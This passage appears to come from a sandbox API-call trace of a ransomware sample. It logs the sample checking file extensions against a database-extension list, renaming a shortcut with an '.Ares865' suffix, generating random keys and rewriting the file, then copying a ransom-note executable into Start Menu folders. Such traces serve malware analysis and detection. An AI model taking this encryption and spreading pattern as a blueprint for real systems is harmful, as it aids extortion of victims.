returned 7 [0058.138] lstrcmpiW (lpString1="elp.lnk", lpString2="sqlite3") returned -1 [0058.138] lstrlenW (lpString="sqlitedb") returned 8 [0058.138] lstrlenW (lpString="xml") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.138] lstrlenW (lpString="$er") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.138] lstrlenW (lpString="4dd") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.138] lstrlenW (lpString="4dl") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.138] lstrlenW (lpString="^^^") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.138] lstrlenW (lpString="abs") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.138] lstrlenW (lpString="abx") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.138] lstrlenW (lpString="accdb") returned 5 [0058.138] lstrcmpiW (lpString1="p.lnk", lpString2="accdb") returned 1 [0058.138] lstrlenW (lpString="accdc") returned 5 [0058.138] lstrcmpiW (lpString1="p.lnk", lpString2="accdc") returned 1 [0058.138] lstrlenW (lpString="accde") returned 5 [0058.138] lstrcmpiW (lpString1="p.lnk", lpString2="accde") returned 1 [0058.138] lstrlenW (lpString="accdr") returned 5 [0058.138] lstrcmpiW (lpString1="p.lnk", lpString2="accdr") returned 1 [0058.139] lstrlenW (lpString="accdt") returned 5 [0058.139] lstrcmpiW (lpString1="p.lnk", lpString2="accdt") returned 1 [0058.139] lstrlenW (lpString="accdw") returned 5 [0058.139] lstrcmpiW (lpString1="p.lnk", lpString2="accdw") returned 1 [0058.139] lstrlenW (lpString="accft") returned 5 [0058.139] lstrcmpiW (lpString1="p.lnk", lpString2="accft") returned 1 [0058.139] lstrlenW (lpString="adb") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.139] lstrlenW (lpString="adb") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.139] lstrlenW (lpString="ade") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.139] lstrlenW (lpString="adf") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.139] lstrlenW (lpString="adn") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.139] lstrlenW (lpString="adp") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.139] lstrlenW (lpString="alf") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.139] lstrlenW (lpString="ask") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.139] lstrlenW (lpString="btr") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.139] lstrlenW (lpString="cat") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.139] lstrlenW (lpString="cdb") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.139] lstrlenW (lpString="ckp") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.139] lstrlenW (lpString="cma") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.139] lstrlenW (lpString="cpd") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.139] lstrlenW (lpString="dacpac") returned 6 [0058.139] lstrcmpiW (lpString1="lp.lnk", lpString2="dacpac") returned 1 [0058.139] lstrlenW (lpString="dad") returned 3 [0058.139] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.139] lstrlenW (lpString="dadiagrams") returned 10 [0058.140] lstrlenW (lpString="daschema") returned 8 [0058.140] lstrlenW (lpString="db-journal") returned 10 [0058.140] lstrlenW (lpString="db-shm") returned 6 [0058.140] lstrcmpiW (lpString1="lp.lnk", lpString2="db-shm") returned 1 [0058.140] lstrlenW (lpString="db-wal") returned 6 [0058.140] lstrcmpiW (lpString1="lp.lnk", lpString2="db-wal") returned 1 [0058.140] lstrlenW (lpString="dbc") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.140] lstrlenW (lpString="dbs") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.140] lstrlenW (lpString="dbt") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.140] lstrlenW (lpString="dbv") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.140] lstrlenW (lpString="dbx") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.140] lstrlenW (lpString="dcb") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.140] lstrlenW (lpString="dct") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.140] lstrlenW (lpString="dcx") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.140] lstrlenW (lpString="ddl") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.140] lstrlenW (lpString="dlis") returned 4 [0058.140] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.140] lstrlenW (lpString="dp1") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.140] lstrlenW (lpString="dqy") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.140] lstrlenW (lpString="dsk") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.140] lstrlenW (lpString="dsn") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.140] lstrlenW (lpString="dtsx") returned 4 [0058.140] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.140] lstrlenW (lpString="dxl") returned 3 [0058.140] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.141] lstrlenW (lpString="eco") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.141] lstrlenW (lpString="ecx") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.141] lstrlenW (lpString="edb") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.141] lstrlenW (lpString="epim") returned 4 [0058.141] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.141] lstrlenW (lpString="fcd") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.141] lstrlenW (lpString="fdb") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.141] lstrlenW (lpString="fic") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.141] lstrlenW (lpString="flexolibrary") returned 12 [0058.141] lstrlenW (lpString="fm5") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.141] lstrlenW (lpString="fmp") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.141] lstrlenW (lpString="fmp12") returned 5 [0058.141] lstrcmpiW (lpString1="p.lnk", lpString2="fmp12") returned 1 [0058.141] lstrlenW (lpString="fmpsl") returned 5 [0058.141] lstrcmpiW (lpString1="p.lnk", lpString2="fmpsl") returned 1 [0058.141] lstrlenW (lpString="fol") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.141] lstrlenW (lpString="fp3") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.141] lstrlenW (lpString="fp4") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.141] lstrlenW (lpString="fp5") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.141] lstrlenW (lpString="fp7") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.141] lstrlenW (lpString="fpt") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.141] lstrlenW (lpString="frm") returned 3 [0058.141] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.141] lstrlenW (lpString="gdb") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.142] lstrlenW (lpString="gdb") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.142] lstrlenW (lpString="grdb") returned 4 [0058.142] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.142] lstrlenW (lpString="gwi") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.142] lstrlenW (lpString="hdb") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.142] lstrlenW (lpString="his") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.142] lstrlenW (lpString="ib") returned 2 [0058.142] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.142] lstrlenW (lpString="idb") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.142] lstrlenW (lpString="ihx") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.142] lstrlenW (lpString="itdb") returned 4 [0058.142] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.142] lstrlenW (lpString="itw") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.142] lstrlenW (lpString="jet") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.142] lstrlenW (lpString="jtx") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.142] lstrlenW (lpString="kdb") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.142] lstrlenW (lpString="kexi") returned 4 [0058.142] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.142] lstrlenW (lpString="kexic") returned 5 [0058.142] lstrcmpiW (lpString1="p.lnk", lpString2="kexic") returned 1 [0058.142] lstrlenW (lpString="kexis") returned 5 [0058.142] lstrcmpiW (lpString1="p.lnk", lpString2="kexis") returned 1 [0058.142] lstrlenW (lpString="lgc") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.142] lstrlenW (lpString="lwx") returned 3 [0058.142] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.142] lstrlenW (lpString="maf") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.143] lstrlenW (lpString="maq") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.143] lstrlenW (lpString="mar") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.143] lstrlenW (lpString="marshal") returned 7 [0058.143] lstrcmpiW (lpString1="elp.lnk", lpString2="marshal") returned -1 [0058.143] lstrlenW (lpString="mas") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.143] lstrlenW (lpString="mav") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.143] lstrlenW (lpString="maw") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.143] lstrlenW (lpString="mdbhtml") returned 7 [0058.143] lstrcmpiW (lpString1="elp.lnk", lpString2="mdbhtml") returned -1 [0058.143] lstrlenW (lpString="mdn") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.143] lstrlenW (lpString="mdt") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.143] lstrlenW (lpString="mfd") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.143] lstrlenW (lpString="mpd") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.143] lstrlenW (lpString="mrg") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.143] lstrlenW (lpString="mud") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.143] lstrlenW (lpString="mwb") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.143] lstrlenW (lpString="myd") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.143] lstrlenW (lpString="ndf") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.143] lstrlenW (lpString="nnt") returned 3 [0058.143] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.143] lstrlenW (lpString="nrmlib") returned 6 [0058.143] lstrcmpiW (lpString1="lp.lnk", lpString2="nrmlib") returned -1 [0058.143] lstrlenW (lpString="ns2") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.144] lstrlenW (lpString="ns3") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.144] lstrlenW (lpString="ns4") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.144] lstrlenW (lpString="nsf") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.144] lstrlenW (lpString="nv") returned 2 [0058.144] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.144] lstrlenW (lpString="nv2") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.144] lstrlenW (lpString="nwdb") returned 4 [0058.144] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.144] lstrlenW (lpString="nyf") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.144] lstrlenW (lpString="odb") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.144] lstrlenW (lpString="odb") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.144] lstrlenW (lpString="oqy") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.144] lstrlenW (lpString="ora") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.144] lstrlenW (lpString="orx") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.144] lstrlenW (lpString="owc") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.144] lstrlenW (lpString="p96") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.144] lstrlenW (lpString="p97") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.144] lstrlenW (lpString="pan") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.144] lstrlenW (lpString="pdb") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.144] lstrlenW (lpString="pdm") returned 3 [0058.144] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.144] lstrlenW (lpString="pnz") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.145] lstrlenW (lpString="qry") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.145] lstrlenW (lpString="qvd") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.145] lstrlenW (lpString="rbf") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.145] lstrlenW (lpString="rctd") returned 4 [0058.145] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.145] lstrlenW (lpString="rod") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.145] lstrlenW (lpString="rodx") returned 4 [0058.145] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.145] lstrlenW (lpString="rpd") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.145] lstrlenW (lpString="rsd") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.145] lstrlenW (lpString="sas7bdat") returned 8 [0058.145] lstrlenW (lpString="sbf") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.145] lstrlenW (lpString="scx") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.145] lstrlenW (lpString="sdb") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.145] lstrlenW (lpString="sdc") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.145] lstrlenW (lpString="sdf") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.145] lstrlenW (lpString="sis") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.145] lstrlenW (lpString="spq") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.145] lstrlenW (lpString="te") returned 2 [0058.145] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.145] lstrlenW (lpString="teacher") returned 7 [0058.145] lstrcmpiW (lpString1="elp.lnk", lpString2="teacher") returned -1 [0058.145] lstrlenW (lpString="tmd") returned 3 [0058.145] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.146] lstrlenW (lpString="tps") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.146] lstrlenW (lpString="trc") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.146] lstrlenW (lpString="trc") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.146] lstrlenW (lpString="trm") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.146] lstrlenW (lpString="udb") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.146] lstrlenW (lpString="udl") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.146] lstrlenW (lpString="usr") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.146] lstrlenW (lpString="v12") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.146] lstrlenW (lpString="vis") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.146] lstrlenW (lpString="vpd") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.146] lstrlenW (lpString="vvv") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.146] lstrlenW (lpString="wdb") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.146] lstrlenW (lpString="wmdb") returned 4 [0058.146] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.146] lstrlenW (lpString="wrk") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.146] lstrlenW (lpString="xdb") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.146] lstrlenW (lpString="xld") returned 3 [0058.146] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.146] lstrlenW (lpString="xmlff") returned 5 [0058.146] lstrcmpiW (lpString1="p.lnk", lpString2="xmlff") returned -1 [0058.146] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\Help.lnk.Ares865") returned 70 [0058.146] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\maintenance\\help.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\Help.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\maintenance\\help.lnk.ares865"), dwFlags=0x1) returned 1 [0058.147] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\Help.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\maintenance\\help.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.147] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262) returned 1 [0058.147] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.147] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.148] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0058.148] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0058.148] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.148] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.148] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x154 [0058.151] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0058.151] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0058.152] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.152] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0058.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.153] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.153] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.153] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.153] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.153] CloseHandle (hObject=0x154) returned 1 [0058.153] CloseHandle (hObject=0x15c) returned 1 [0058.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0058.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.154] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d25ee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.155] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.155] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d25ee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0058.155] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0058.155] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d23a8 [0058.155] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools" [0058.155] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0058.155] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0058.155] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools") returned 62 [0058.155] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools" [0058.155] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.155] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\administrative tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.155] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0058.155] GetLastError () returned 0x0 [0058.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.156] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.156] CloseHandle (hObject=0x118) returned 1 [0058.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.156] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.156] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, 